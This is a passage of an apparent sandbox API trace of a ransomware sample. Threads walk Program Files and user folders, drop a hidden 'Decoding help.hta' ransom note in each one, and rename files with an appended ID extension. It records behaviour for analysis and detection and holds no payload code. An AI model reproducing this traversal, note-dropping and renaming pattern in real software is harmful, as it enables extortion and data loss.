lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" [0061.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" [0061.432] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0061.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.514] FindNextFileW (in: hFindFile=0x5da678, lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0062.514] FindClose (in: hFindFile=0x5da678 | out: hFindFile=0x5da678) returned 1 Thread: id = 942 os_tid = 0x578 [0060.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*", lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3670 [0060.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.042] FindNextFileW (in: hFindFile=0x5e3670, lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.043] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.043] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.043] FindNextFileW (in: hFindFile=0x5e3670, lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0060.043] lstrcpyW (in: lpString1=0x2aa78f10, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*" [0060.043] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*") returned 69 [0060.043] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\Decoding help.hta" [0060.043] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\decoding help.hta")) returned 0xffffffff [0060.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0061.434] WriteFile (in: hFile=0x378, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xf48fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xf48fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.435] CloseHandle (hObject=0x378) returned 1 [0061.444] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.444] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0061.444] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0061.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*" [0061.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*") returned 69 [0061.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" [0061.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" [0061.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0061.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.515] FindNextFileW (in: hFindFile=0x5e3670, lpFindFileData=0xf48fd30 | out: lpFindFileData=0xf48fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0062.515] FindClose (in: hFindFile=0x5e3670 | out: hFindFile=0x5e3670) returned 1 Thread: id = 943 os_tid = 0x510 [0060.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*", lpFindFileData=0x1024fd30 | out: lpFindFileData=0x1024fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cb0 [0060.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.054] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1024fd30 | out: lpFindFileData=0x1024fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.054] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.054] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1024fd30 | out: lpFindFileData=0x1024fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0060.054] lstrcpyW (in: lpString1=0x2aa80f18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*" [0060.054] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*") returned 64 [0060.054] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\Decoding help.hta" [0060.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\decoding help.hta")) returned 0xffffffff [0060.055] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0061.445] WriteFile (in: hFile=0x378, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1024fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1024fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.446] CloseHandle (hObject=0x378) returned 1 [0061.446] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.446] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0061.446] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0061.446] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*" [0061.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*") returned 64 [0061.446] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" [0061.446] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" [0061.446] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0061.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.515] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1024fd30 | out: lpFindFileData=0x1024fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe779eb51, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe79d9fc4, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe79d9fc4, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0062.515] FindClose (in: hFindFile=0x5e2cb0 | out: hFindFile=0x5e2cb0) returned 1 Thread: id = 944 os_tid = 0x3a8 [0060.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*.*", lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cb0 [0060.053] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.053] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.053] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.053] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x1185fd30 | out: lpFindFileData=0x1185fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.053] FindClose (in: hFindFile=0x5e2cb0 | out: hFindFile=0x5e2cb0) returned 1 Thread: id = 945 os_tid = 0x91c [0060.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x11e9fd30 | out: lpFindFileData=0x11e9fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 946 os_tid = 0x5a8 [0060.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*.*", lpFindFileData=0x1211fd30 | out: lpFindFileData=0x1211fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ab0 [0062.528] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.528] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x1211fd30 | out: lpFindFileData=0x1211fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.528] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.529] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.529] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x1211fd30 | out: lpFindFileData=0x1211fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f955d49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f955d49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 Thread: id = 947 os_tid = 0x4ac [0060.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*", lpFindFileData=0x12edfd30 | out: lpFindFileData=0x12edfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5b70 [0060.072] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.072] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0x12edfd30 | out: lpFindFileData=0x12edfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.072] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.072] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.072] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0x12edfd30 | out: lpFindFileData=0x12edfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 1 [0060.072] lstrcmpW (lpString1=".", lpString2="AssetCache") returned -1 [0060.072] lstrcmpW (lpString1="..", lpString2="AssetCache") returned -1 [0060.072] lstrcmpiW (lpString1="windows", lpString2="AssetCache") returned 1 [0060.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*" [0060.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*") returned 72 [0060.072] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="AssetCache" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0060.072] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*.*" [0060.072] GlobalMemoryStatus (in: lpBuffer=0x12edfd10 | out: lpBuffer=0x12edfd10) [0060.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11344318, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x70c [0060.079] CloseHandle (hObject=0x70c) returned 1 [0060.079] FindNextFileW (in: hFindFile=0x5a5b70, lpFindFileData=0x12edfd30 | out: lpFindFileData=0x12edfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x1d40bff0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d40bff0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetCache", cAlternateFileName="ASSETC~1")) returned 0 [0060.079] FindClose (in: hFindFile=0x5a5b70 | out: hFindFile=0x5a5b70) returned 1 Thread: id = 948 os_tid = 0x790 [0060.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\*.*", lpFindFileData=0x14e1fd30 | out: lpFindFileData=0x14e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5db0 [0060.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.070] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x14e1fd30 | out: lpFindFileData=0x14e1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, 